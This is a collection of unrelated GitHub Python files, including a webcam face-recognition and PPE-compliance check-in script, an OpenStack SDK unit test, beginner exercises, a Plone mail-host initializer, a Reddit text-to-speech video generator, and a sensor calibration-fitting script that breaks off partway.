else:\n position = None\n worker_id = None\n\n # collection = db[\"checkin_1\"]\n collection = db[\"checkin_2\"]\n\n\n print(\"=====================================================================================\")\n checkin_entry = {\n \"name\": name,\n \"worker_id\": worker_id,\n \"position\": position,\n \"supervisor\": supervisor,\n \"time\": datetime.now()\n }\n checkin_data[\"check_ins\"].append(checkin_entry)\n checkin_recorded.add(name)\n\n # Insert the check-in data for the day into the MongoDB collection\n collection.update_one({\"date\": checkin_data[\"date\"]}, \n {\"$push\": {\"check_ins\": {\"$each\": checkin_data[\"check_ins\"]}}}, \n upsert=True)\n \n #Draw Box for Face\n if draw_box_face:\n for (top, right, bottom, left) in face_locations:\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n if name != \"Unknown\":\n cv2.rectangle(imgBackground[158:158 + 480, 52:52 + 640], (left, top), (right, bottom), (0, 255, 0), 2)\n cv2.rectangle(imgBackground[158:158 + 480, 52:52 + 640], (left, bottom - 35), (right, bottom), (0, 255, 0), cv2.FILLED)\n cv2.putText(imgBackground[158:158 + 480, 52:52 + 640], name, (left + 6, bottom - 6), cv2.FONT_HERSHEY_DUPLEX, 1.0, (255, 255, 255), 1)\n\ndef main():\n encoding_list = retrieve_encoding()\n\n checkin_recorded = set() # Initializes an empty set called checkin_recorded. This set will be used to keep track of the names of employees who have already checked in to avoid duplicates.\n \n # Create a worker_breaches_list to keep track of workers with PPE breaches\n worker_breaches = []\n\n item_number = 0\n counter = 0\n\n known_face_encodings = [encoding[1] for encoding in encoding_list]\n known_face_names = [encoding[0] for encoding in encoding_list]\n \n face_names = []\n ppe_list = []\n draw_box_face = True\n draw_box_ppe = False\n\n while True:\n # Grab a single frame of video\n ret, frame = video_capture.read() \n\n imgBackground[158:158 + 480, 52:52 + 640] = frame\n imgBackground[30:30 + 674, 800:800 + 440] = model\n ROI = imgBackground[158:158 + 480, 52 + 160 :52 + 480]\n\n facial_recognition(frame, draw_box_face, known_face_encodings, known_face_names, face_names, checkin_recorded)\n\n cv2.putText(imgBackground, \"Authenticating...\", (910, 655), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 2)\n\n cv2.imshow('SAFETY CONSTRUCTION SYSTEM', imgBackground)\n\n results = ai_model.predict(ROI, verbose=False)\n #PPE_list - 3 Dimensions Array\n ppe_item = plot_bboxes(draw_box_ppe, ROI, results[0].boxes.data, score=False, conf=0.85)\n\n ppe_list.append(ppe_item)\n #print(ppe_list)\n print(ppe_item)\n print(face_names[-10:])\n\n #Find the most face detect\n if len(face_names) > 10:\n draw_box_face = False\n draw_box_ppe = True\n #face_names = face_names[-15:]\n \n most_frequent_name = Counter(face_names[:10]).most_common(1)[0][0]\n print(\"Session Holder: \" + most_frequent_name)\n\n if most_frequent_name != \"Unknown\" and most_frequent_name != None:\n if employee_data == None or employee_data['name'] != most_frequent_name: \n thread = search_data_thread(most_frequent_name)\n # Set the stop_event object to stop the thread\n stop_event.set()\n # Wait for the thread to finish\n thread.join()\n # Reset the stop_event object for the next iteration\n stop_event.clear()\n\n role = employee_data[\"position\"]\n \n cv2.rectangle(imgBackground, (52 + 160, 161), (52 + 480, 636), (0,255,0), 1, cv2.LINE_AA) \n cv2.putText(imgBackground, \"Hi, \" + most_frequent_name, (875, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\n cv2.putText(imgBackground, \"PPE Require:\", (830, 290), cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 255, 255), 2)\n cv2.putText(imgBackground, \"Your Role is:\", (835, 210), cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 255, 255), 2)\n\n if most_frequent_name == \"Astro\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[0]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n \n elif most_frequent_name == \"Chris\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[1]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n \n elif most_frequent_name == \"Daren\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[2]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n\n elif most_frequent_name == \"Loc\":\n imgBackground[50:50 + 108, 1105:1105 + 108] = imgAvaList[3]\n cv2.putText(imgBackground, role, (845, 235), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 1)\n\n ppe_helmet = None\n ppe_vest = None\n ppe_mask = None\n\n if len(ppe_list) > 10:\n ppe_list = ppe_list[-10:]\n #if PPE existing more than 5 frames is True, less than 2 frames is as False\n if role != \"Supervisor\":\n if sum(sublist.count(\"no-helmet\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"helmet\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[0]\n ppe_helmet = True\n elif sum(sublist.count(\"helmet\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n else:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n \n if sum(sublist.count(\"no-vest\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"vest\") for sublist in ppe_list) >= 3:\n imgBackground[440:440 + 137, 865:865 + 125] = imgPpeList[1]\n ppe_vest = True\n elif sum(sublist.count(\"vest\") for sublist in ppe_list) <= 2:\n imgBackground[440:440 + 137, 865:865 + 125] = imgPpeList[4]\n ppe_vest = False\n else:\n imgBackground[440:440 + 137, 865:865 + 125] = imgPpeList[4]\n ppe_vest = False\n \n if sum(sublist.count(\"no-mask\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"mask\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[2]\n ppe_mask = True\n elif sum(sublist.count(\"mask\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[5]\n ppe_mask = False\n else:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[5]\n ppe_mask = False\n else:\n ppe_mask = True\n if sum(sublist.count(\"no-helmet\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"helmet\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[0]\n ppe_helmet = True\n elif sum(sublist.count(\"helmet\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n else:\n imgBackground[300:300 + 137, 865:865 + 125] = imgPpeList[3]\n ppe_helmet = False\n \n if sum(sublist.count(\"no-vest\") for sublist in ppe_list) <= 3:\n if sum(sublist.count(\"vest\") for sublist in ppe_list) >= 3:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[1]\n ppe_vest = True\n elif sum(sublist.count(\"vest\") for sublist in ppe_list) <= 2:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[4]\n ppe_vest = False\n else:\n imgBackground[300:300 + 137, 1040:1040 + 125] = imgPpeList[4]\n ppe_vest = False\n \n #Set the Message if both PPE detected\n if ppe_helmet and ppe_vest and ppe_mask:\n imgBackground[635:635 + 35, 900:900 + 300] = clear_text\n cv2.putText(imgBackground, \"You are good to go. Stay Safe!\", (905, 655), cv2.FONT_HERSHEY_COMPLEX_SMALL, 0.8, (255, 255, 255), 2)\n else:\n imgBackground[635:635 + 35, 900:900 + 300] = clear_text\n cv2.putText(imgBackground, \"Please wear PPE!!\", (910, 655), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 255), 2)\n\n\n #REFRESH SESSIONS\n if ppe_item:\n item_number += 1\n\n if item_number % 5 == 0 and most_frequent_name != \"Unknown\":\n counter += 1\n print(\"Session Time: \" + str(counter))\n imgBackground[120:120 + 23, 50:50 + 440] = clear_text2 \n cv2.putText(imgBackground, \"Session Ends in \" + str(16 - counter), (50, 140), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 255), 1)\n\n #Alert Before SESSION ENDS\n if counter > 15:\n #ALERT WHEN BREACH HAPPENED\n breach_ppe = \"\"\n if not ppe_helmet:\n breach_ppe += \"no-helmet , \"\n if not ppe_vest:\n breach_ppe += \"no-vest , \"\n if not ppe_mask:\n breach_ppe += \"no-mask , \"\n\n breach_ppe = breach_ppe[:-3]\n print(breach_ppe)\n\n if breach_ppe != \"\":\n alert_process(breach_ppe, most_frequent_name, worker_breaches)\n\n #RESET SESSIONS\n imgBackground[120:120 + 23, 50:50 + 440] = clear_text2 \n face_names.clear()\n counter = 0\n draw_box_face = True\n draw_box_ppe = False\n \n if most_frequent_name == \"Unknown\":\n #RESET SESSIONS IF NO ONE DETECTED\n imgBackground[120:120 + 23, 50:50 + 440] = clear_text2 \n face_names.clear()\n counter = 0\n draw_box_face = True\n draw_box_ppe = False\n\n # Display the results\n cv2.imshow('SAFETY CONSTRUCTION SYSTEM', imgBackground)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Release handle to the webcam\n video_capture.release()\n cv2.destroyAllWindows()\n\n# encoding = train_encoding(\"Loc.1.jpg\")\n# save_encodings(encoding)\nvideo_capture = cv2.VideoCapture(0)\nvideo_capture.set(3, 640)\nvideo_capture.set(4, 480)\n\nmain()","repo_name":"BeginnerLoc/Flask-Server","sub_path":"ai_server/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":25497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31409986556","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom openstack.tests.unit import base\n\nfrom otcextensions.sdk.identity.v3 import agency\n\n\nFAKE_ID = \"945d-fe449be00148\"\nEXAMPLE = {\n \"trust_domain_name\": \"exampledomain\",\n \"description\": \" testsfdas \",\n \"trust_domain_id\": \"b3f266d0c08544a0859740de8b84e850\",\n \"id\": \"afca8ddf2e92469a8fd26a635da5206f\",\n \"duration\": None,\n \"create_time\": \"2017-01-04T09:09:15.000000\",\n \"expire_time\": None,\n \"domain_id\": \"0ae9c6993a2e47bb8c4c7a9bb8278d61\",\n \"name\": \"exampleagency\"\n}\n\n\nclass TestAgency(base.TestCase):\n\n def setUp(self):\n super(TestAgency, self).setUp()\n\n def test_basic(self):\n sot = agency.Agency()\n\n self.assertEqual('/v3.0/OS-AGENCY/agencies', sot.base_path)\n self.assertEqual('agencies', sot.resources_key)\n self.assertEqual('agency', sot.resource_key)\n\n self.assertTrue(sot.allow_list)\n self.assertTrue(sot.allow_fetch)\n self.assertTrue(sot.allow_create)\n self.assertTrue(sot.allow_delete)\n self.assertTrue(sot.allow_commit)\n\n self.assertDictEqual({\n 'domain_id': 'domain_id',\n 'limit': 'limit',\n 'marker': 'marker',\n 'name': 'name',\n 'trust_domain_id': 'trust_domain_id'},\n sot._query_mapping._mapping\n )\n\n def test_make_it(self):\n\n sot = agency.Agency(connection=self.cloud, **EXAMPLE)\n # Check how the override with \"real\" connection works\n self.assertEqual(\n 'https://identity.example.com/v3.0/OS-AGENCY/agencies',\n sot.base_path)\n\n self.assertEqual(EXAMPLE['id'], sot.id)\n self.assertEqual(EXAMPLE['description'], sot.description)\n self.assertEqual(EXAMPLE['trust_domain_id'], sot.trust_domain_id)\n self.assertEqual(EXAMPLE['create_time'], sot.created_at)\n self.assertEqual(EXAMPLE['expire_time'], sot.expire_at)\n self.assertEqual(EXAMPLE['domain_id'], sot.domain_id)\n","repo_name":"opentelekomcloud/python-otcextensions","sub_path":"otcextensions/tests/unit/sdk/identity/v3/test_agency.py","file_name":"test_agency.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"95"} +{"seq_id":"20618548508","text":"\"\"\"\n### Zadanie 2.3\n​\nNapisz program, który odczytuje od użytkownika wiele liczb.\n​\nProgram powinien wyliczyć i na końcu wypisać następujące statystyki:\n​\n- liczba podanych liczb (ile sztuk),\n- suma,\n- średnia,\n- minimum\n- maksimum\n​\nNIE używaj funkcji wbudowanych!\n​\n\"\"\"\n\ni = 0\nsuma = 0\nmax = None\nmin = None\nsrednia = None\n\nwhile True:\n liczba = input(\"Podaj liczbę lub wpisz koniec aby zakończyć: \")\n if liczba == \"koniec\":\n break\n liczba = int(liczba)\n\n if max == None:\n max = liczba\n min = liczba\n if max < liczba:\n max = liczba\n if min > liczba:\n min = liczba\n\n suma += liczba\n i += 1\nif i>0:\n print(f\"\"\"Max: {max}\n Min: {min}\n Suma: {suma}\n Ilość liczb: {i}\n Średnia: {suma/i}\n \"\"\")\nelse:\n print(\"Nie podales żadnej liczby więc nie moge podać wyniku\")","repo_name":"RasNadi/zadanie_domowe_rp","sub_path":"zadanie_domowe_rp/zad2.3_rp.py","file_name":"zad2.3_rp.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41077276334","text":"\n# 01\ndef name_letters(): \n name = input('Digite seu nome: ')\n\n for letra in name:\n print(letra)\n\n# 02\ndef numbers_sum():\n numbers = []\n soma = 0\n while len(numbers) < 1:\n numbers = input('Digite os numeros separados por um espaço: ').split()\n for number in numbers:\n if not number.isdigit(): \n print(f'Erro ao somar valores, {number} é um valor inválido')\n else:\n soma += int(number)\n print(soma)\n\n# 03\n\ndef reprovados():\n line_list = []\n with open(\"arquivo.txt\", \"r\") as file:\n for line in file:\n line_tupla = line.split()\n if int(line_tupla[1]) < 6:\n line_list.append(line_tupla)\n file.close()\n print(line_list)\n","repo_name":"luizlacerdam/trybe-exercicios","sub_path":"04-cs/section-01-python/day-02-input-output-with-testing/exercicio-de-aula.py","file_name":"exercicio-de-aula.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19474738986","text":"# -*- coding: utf-8 -*-\nfrom App.config import getConfiguration\n\nimport logging\nimport os\n\n\nLOG = None\nENABLED = None\nFIXED_ADDRESS = []\n\nTRUISMS = [\"yes\", \"y\", \"true\", \"on\"]\nDevelopmentMode = False\n\n\ndef initialize(context):\n global LOG\n global FIXED_ADDRESS\n global ENABLED\n LOG = logging.getLogger(\"PrintingMailHost\")\n\n ENABLED = os.environ.get(\"ENABLE_PRINTING_MAILHOST\", None)\n addresses = os.environ.get(\"PRINTING_MAILHOST_FIXED_ADDRESS\", \"\")\n FIXED_ADDRESS = [addr for addr in addresses.strip().split(\" \") if addr]\n\n # check to see if the environment var is set to a 'true' value\n if (ENABLED is not None and ENABLED.lower() in TRUISMS) or (\n ENABLED is None and getConfiguration().debug_mode is True\n ):\n # DevelopmentMode is checked by plone.api\n DevelopmentMode = True # noqa\n LOG.warning(\"Hold on to your hats folks, I'm a-patchin'\")\n from Products.PrintingMailHost import Patch\n\n Patch # pyflakes\n","repo_name":"collective/Products.PrintingMailHost","sub_path":"Products/PrintingMailHost/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"21779329233","text":"#!/usr/bin/env python3\nimport asyncio\nfrom contextlib import closing\nimport csv\nimport os\nimport io\nfrom xml.dom import minidom\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nimport sqlite3\nimport gtts\nfrom selenium import webdriver\nimport PIL.Image\nimport ffmpeg\n\nbrowsers = {\n 'chrome': webdriver.Chrome,\n 'firefox': webdriver.Firefox,\n}\nbrowser_options = {\n 'chrome': webdriver.chrome.options.Options(),\n 'firefox': webdriver.FirefoxOptions(),\n}\nchrome = browser_options['chrome']\nchrome.add_argument(\"--headless\")\nchrome.add_argument(\"--window-size=1280,720\")\nchrome.add_argument(\"--enable-use-zoom-for-dsf=false\")\nchrome.add_argument(\"--hide-scrollbars\")\nchrome.add_argument(\"--mute-audio\")\nchrome.add_argument(\"--disable-default-apps\")\nchrome.add_argument(\"--disable-extensions\")\nchrome.add_argument(\"--disable-component-update\")\nchrome.add_argument(\"--disable-back-forward-cache\")\nchrome.add_argument(\"--disable-backgrounding-occluded-windows\")\n\nfirefox = browser_options['firefox']\nfirefox.add_argument(\"--headless\")\nfirefox.add_argument(\"--width=1280\")\nfirefox.add_argument(\"--height=720\")\n\n\nbrowser_type = os.getenv('AITA_BROWSER', 'chrome')\nassert browser_type in ('chrome', 'firefox')\n\ninference_folder = os.path.dirname(os.path.abspath(__file__))\n\nplayed_dht = os.path.join(inference_folder, 'played.db')\nif not os.path.exists(played_dht):\n raise Exception(\"You need to run 'clean_csvs.py' in the dataset folder first to get the Reddit posts.\")\n\nremoved_im_path = os.path.join(inference_folder, 'removed.svg')\nremoved_im = minidom.parse(removed_im_path).getElementsByTagName('path')[0].getAttribute('d')\ndeleted_im_path = os.path.join(inference_folder, 'deleted.svg')\ndeleted_im = minidom.parse(deleted_im_path).getElementsByTagName('path')[0].getAttribute('d')\nawaiting_im_path = os.path.join(inference_folder, 'awaiting.svg')\nawaiting_im = minidom.parse(deleted_im_path).getElementsByTagName('path')[0].getAttribute('d')\n\nuse_named_pipes = os.getenv('AITA_NAMED_PIPES', '') == '1'\n\ngtts.tokenizer.symbols.SUB_PAIRS.extend((\n ('YTA', \"You're the asshole\"),\n ('NTA', \"Not the asshole\"),\n ('ESH', \"Everyone sucks here\"),\n ('NAH', \"No assholes here\"),\n ('AITA', \"Am I the asshole\"),\n ('WIBTA', \"Would I be the asshole\"),\n # ('tl;dr', \"Tea El Dee Are\"),\n))\n\nasync def tts(selftext, comment, redd_id):\n # Create a named pipe if on Unix\n # This will make the processing faster\n if use_named_pipes:\n try:\n os.mkfifo(f'tmp_0_{redd_id}.mp3')\n os.mkfifo(f'{redd_id}.mp3')\n except OSError as oe:\n if oe.errno != errno.EEXIST:\n raise\n\n segments = []\n\n # The actual text\n with open(f'tmp_0_{redd_id}.mp3', 'wb') as f:\n tts = gtts.gTTS(selftext, lang='en')\n tts.write_to_fp(f)\n\n audio = ffmpeg.input(f'tmp_0_{redd_id}.mp3')\n segments.append(audio)\n\n # Silence\n audio = ffmpeg.input(\n 'anullsrc=channel_layout=mono:sample_rate=24000',\n format='lavfi',\n t=1 # how long you want the silence to be in seconds\n )\n segments.append(audio)\n\n # The comment\n audio = ffmpeg.input(f'pipe:')\n segments.append(audio)\n\n combined = ffmpeg.concat(*segments, v=0, a=1)\n process = combined.output(f'{redd_id}.mp3').global_args('-loglevel', 'error') \\\n .run_async(pipe_stdin=True)\n\n tts = gtts.gTTS(comment, lang='en')\n tts.write_to_fp(process.stdin)\n process.stdin.close()\n process.wait()\n\n os.remove(f'tmp_0_{redd_id}.mp3')\n\n\nasync def get_videos(posts, model, limit=-1):\n new_snips = 0\n tts_promises = []\n\n if limit == 0: return 0\n\n with browsers[browser_type](options=browser_options[browser_type]) as driver, \\\n closing(sqlite3.connect(played_dht)) as con:\n dx, dy = driver.execute_script(\"var w=window; return [w.outerWidth - w.innerWidth, w.outerHeight - w.innerHeight];\")\n if dx > 0 and dy > 0:\n driver.set_window_size(1280 + dx, 720 + dy)\n\n driver.get('https://www.reddit.com/r/AmItheAsshole') # Load some cookies?\n\n for post in posts:\n selftext = post['selftext']\n url = post['url']\n redd_id = post['id']\n if con.execute(\"SELECT * FROM PostsPlayed WHERE PostId == ?\", (redd_id,)).fetchone(): # will be none by default\n continue\n im_path = f'{redd_id}.png'\n no_img = not os.path.exists(im_path)\n\n if no_img:\n print(f\"capture {redd_id}\")\n driver.get(url)\n\n # Test to see if the page was removed\n if any(\n tag.get_attribute('d') in (removed_im, deleted_im, awaiting_im)\n for tag in driver.find_elements(webdriver.common.by.By.TAG_NAME, 'path')\n ):\n con.execute('INSERT INTO PostsPlayed VALUES (?,?,?)', (redd_id, True, 0))\n con.commit()\n print(f'{redd_id} was removed')\n continue\n\n # Start downloading the mp3 before the screenshot is taken to save\n # a little bit of time\n if not os.path.exists(f'{redd_id}.mp3'):\n print(f\"tts {redd_id}\")\n comment = model(post)\n if comment is None:\n con.execute('INSERT INTO PostsPlayed VALUES (?,?,?)', (redd_id, True, 0))\n con.commit()\n print(f'no AI comment {redd_id}')\n continue\n tts_promises.append(tts(selftext, comment, redd_id))\n new_snips += 1\n\n # Take the screenshot if the photo isn't there\n if no_img:\n (\n webdriver.ActionChains(driver)\n .scroll_by_amount(0, 224)\n .perform()\n )\n\n png = driver.get_screenshot_as_png()\n\n if use_named_pipes:\n try:\n os.mkfifo(f'{redd_id}.png')\n except OSError as oe:\n if oe.errno != errno.EEXIST:\n raise\n\n # Reduce resolution so my poor MacBook Air will be happy.\n im = PIL.Image.open(io.BytesIO(png))\n im = im.resize((1280, 720))\n im.save(im_path)\n\n if new_snips == limit:\n break\n\n for promise in tts_promises:\n await promise\n\n return new_snips\n\ndef load_model(model_path):\n cwd = os.getcwd()\n os.chdir(os.path.dirname(__file__))\n import nnsave\n os.chdir(cwd)\n\n model_path = os.path.join(os.getcwd(), model_path)\n models_folder = os.path.join(os.path.dirname(__file__), '..')\n with nnsave.PackageSandbox(models_folder) as sand:\n model = sand.load_pickle(os.path.relpath(model_path, models_folder))\n from models.wrappers import Commenter, _fallback\n if not isinstance(model, Commenter):\n print(\"Model not Commenter. Rewrapping.\")\n model = _fallback(model)\n return model\n # os.chdir(os.path.join(os.path.dirname(__file__), '../models'))\n # with open(model_path, 'rb') as f:\n # model = pickle.load(f)\n # os.chdir(cwd)\n # return model\n\ndef load_posts(path):\n if path is None:\n # SQL database\n with closing(sqlite3.connect(played_dht)) as con:\n con.row_factory = sqlite3.Row\n while True:\n yield from con.execute(\"\"\"\n SELECT Posts.* FROM Posts\n LEFT JOIN PostsPlayed ON PostsPlayed.PostId == Posts.id\n WHERE PostsPlayed.PostId IS NULL\n \"\"\").fetchall()\n else:\n # CSV\n if not os.path.isabs(path):\n path = os.path.join('..', path)\n with open(path, 'r') as f:\n yield from csv.DictReader(f)\n\nif __name__ == '__main__':\n import argparse\n p = argparse.ArgumentParser(description=\"Download audio snippets from gTTS\")\n p.add_argument(\"-path\", help=\"path of the posts.csv from the dataset\", default=None) # '../dataset/posts_inference.csv'\n p.add_argument(\"-model\", help=\"path of the model.pkl file\", default='../models/sklearn_models/saved_models/nn_regressor_nrows=20000_generic.pkl')\n p.add_argument(\"-limit\", help=\"the number of audio clips to download\", type=int, default=-1)\n P = p.parse_args()\n\n model_path = os.path.join(os.path.dirname(__file__), P.model)\n model = load_model(model_path)\n\n os.chdir(os.path.join(os.path.dirname(__file__), 'streams'))\n asyncio.run(get_videos(load_posts(P.path), model, P.limit))\n","repo_name":"adichand/AITAJudge","sub_path":"inference/get_audio.py","file_name":"get_audio.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23468108450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 11 10:47:32 2021\n\n@author: Dean\n\nRun this script to identify cross-calibration models and tune model parameters \nfor Pic2 vs Pic1 water concentration and isotope ratios. \n\nSeparate models are tuned for ORACLES 2017 and 2018. For each year, all dates \nwhere there is good WISPER data are used; For 2017, Aug. 12th and 13th, 2017, \nMako's calibration was clearly off and so these flights are omitted.\n\nFor water concentration, the model is assumed to be a line \npassing through the origin and therefore only the slope needs to be tuned.\n\nFor the isotope ratios, the cross-cal model is assumed to be a polynomial \nfunction of Pic2-measured water concentration (q), the respective isotope \nratio delta value (del), and their cross term. The highest power for each of \nthese three terms is identified by minimizing the Beyesian Information \nCriterion. \n\nThe water concentration slopes and the linear coefficients for the optimized \npolynomial models are saved as *.csv files in this folder. Publication-ready \nfigures are also generated and saved in this folder.\n\nFunction list (ordered by relevance)\n=============\n\nget_fits: \n This fxn is run during a call to main, and calls all fxns below either \n directly or indirectly. Gets parameter fits and figures for both years.\n\nget_fits_singleyear: \n Called by 'get_fits()'.\n \nqxcal_modelfit:\n Tune the slope for a water concentration linear model. \n \nisoxcal_modelfit:\n Tune the coefficients for terms in an isotope ratio polynomial model with \n predictor variables q, del, and q*del.\n \nget_poly_terms:\n Generates a pd.DataFrame of all needed powers of predictor vars. Used by \n 'isoratioxcal_modelfit()'.\n \nmodel_isoxcal:\n Returns predictions for an isotope ratio cross-calibration model. E.g. \n once a candidate polynomial model has been identified and parameters \n tuned using 'isoxcal_modelfit()', this function will use the candidate \n function to generate cross-calibrated pic2 measurements.\n\ndraw_fitfig, model_residual_map: \n The two functions used to make the figures. 'draw_fitfig' is the main \n function. 'model_residual_map' generates a 2D map of model residuals \n that can be used as contour plots.\n\nget_wisperdata:\n Returns all WISPER data for a single ORACLES year.\n\"\"\"\n\n\n# Built in:\nimport os\nimport itertools\n\n# Third party:\nimport numpy as np # 1.19.2\nimport matplotlib.pyplot as plt # 3.3.2\nimport pandas as pd # 1.1.3\nimport statsmodels.api as sm # 0.12.0\n\n# My modules:\nimport oversampler\nimport qxcal_model\nimport isoxcal_model\n\n\n\n# ORACLES flight dates where WISPER took good data:\ndates2017_good = ['20170812','20170813','20170815','20170817','20170818',\n '20170821','20170824','20170826','20170828','20170830',\n '20170831','20170902']\ndates2018_good = ['20180927','20180930','20181003','20181007','20181010',\n '20181012','20181015','20181017','20181019','20181021',\n '20181023']\n\n\ndef get_wisperdata(year):\n \"\"\"\n Load all WISPER (q,dD,d18O) data for either 2017 or 2018 with good data \n and average the data into 8 second blocks before returning. \n Return as a pandas df.\n \n year: str, '2017' or '2018'.\n \"\"\"\n # Get paths to all data files for the input year:\n if year=='2017':\n dates_good = dates2017_good\n elif year=='2018':\n dates_good = dates2018_good\n \n path_data_dir = r\"./sensor_data/\" \n fnames = ['WISPER_pic1cal_%s.ict' % d for d in dates_good]\n paths_data = [path_data_dir+f for f in fnames]\n \n \n # Loop through each date and append data to a single pandas df:\n columns = ['h2o_tot1','h2o_tot2','dD_tot1',\n 'dD_tot2','d18O_tot1','d18O_tot2'] # Keep these data columns.\n wisper = pd.DataFrame({}, columns=columns) # Append all data here.\n for p in paths_data:\n data_temp = pd.read_csv(p) # Load.\n data_temp.replace(-9999, np.nan, inplace=True)\n # Average data into 8 s blocks before appending:\n data_blocked = data_temp.groupby(lambda x: np.round(x/8)).mean()\n wisper = wisper.append(data_blocked[columns], ignore_index=True)\n \n return wisper.dropna(how='any') # Drop missing values\n\n\n\ndef get_fits_singleyear(year, wisperdata):\n \"\"\"\n Get cross-cal models and fit parameters for water concentration and each \n isotope ratio for a single ORACLES year. Return as a dict of pandas.Series \n objects.\n \n Polynomial form of model for isotope ratios is identified by minimizing \n the Beyesian Information Criterion.\n \n year: str, '2017' or '2018'.\n \n wisperdata: pandas.DataFrame. Contains all WISPER data for the year.\n \"\"\" \n print(\"****************************************************\\n\"\n \"Cross-calibration fit parameters for ORACLES \"+year+\"\\n\"\n \"****************************************************\")\n \n\n ## Fitting humidity is straightforward:\n ##-----------------\n model_q = qxcal_model.fit(wisperdata, 'h2o_tot1', 'h2o_tot2')\n #print(model_q.summary())\n print('q\\n===')\n print('R2 = %f' % model_q.rsquared)\n\n\n ## Fitting the iso ratios requires polynomial model selection:\n ##-----------------\n def polyord_minBIC(wisperdata, iso):\n \"\"\"\n Using min Bayesian info criterion (BIC) to determine highest power \n (up to 5) of each predictor var and crossterm, for the chosen \n isotopologue. Returns a 3-tuple of ints, where each is the highest \n power to raise the predictor vars: logq, iso, and logq*iso. iso is \n either 'dD' or 'd18O':\n \"\"\"\n # Cartesian product of all poly orders up to 5:\n nord_list = list(itertools.product(range(1,6), range(1,6), range(1,6)))\n bic_list = []\n for nord in nord_list:\n model = isoxcal_model.fit(wisperdata, iso, nord) # Statsmodels results.\n bic_list.append(model.bic) # Append this run's BIC.\n # Combo of poly orders with the minimum BIC:\n return nord_list[np.argmin(bic_list)]\n\n # Find optimal polynomial orders for each iso ratio. Then re-run fit with \n # those poly orders:\n nord_dD = polyord_minBIC(wisperdata, 'dD')\n nord_d18O = polyord_minBIC(wisperdata, 'd18O')\n model_dD = isoxcal_model.fit(wisperdata, 'dD', nord_dD)\n model_d18O = isoxcal_model.fit(wisperdata, 'd18O', nord_d18O)\n \n #print(model_dD.summary())\n #print(model_d18O.summary())\n print('\\ndD\\n===')\n print('nord = % s' % str(nord_dD))\n print('R2 = %f' % model_dD.rsquared) \n print('\\nd18O\\n====')\n print('nord = % s' % str(nord_d18O))\n print('R2 = %f' % model_d18O.rsquared)\n\n\n ## Return parameter fits:\n return {'q':model_q.params, 'dD':model_dD.params, 'd18O':model_d18O.params}\n\n\n\ndef get_fits():\n \"\"\"\n Get cross-calibration formula fit parameters for water concentration and \n both isotopologues for both the 2017 and 2018 ORACLES years.\n \"\"\" \n \"\"\"\n ## Check that all WISPER files with calibrated Pic1 data are in the \n ## necessary directory, otherwise run calibration script to get them:\n ##----------------- \n # 'paths_data' should be the paths of all the files if they exist:\n datesall_good = (pic1cal.dates2017_good + \n 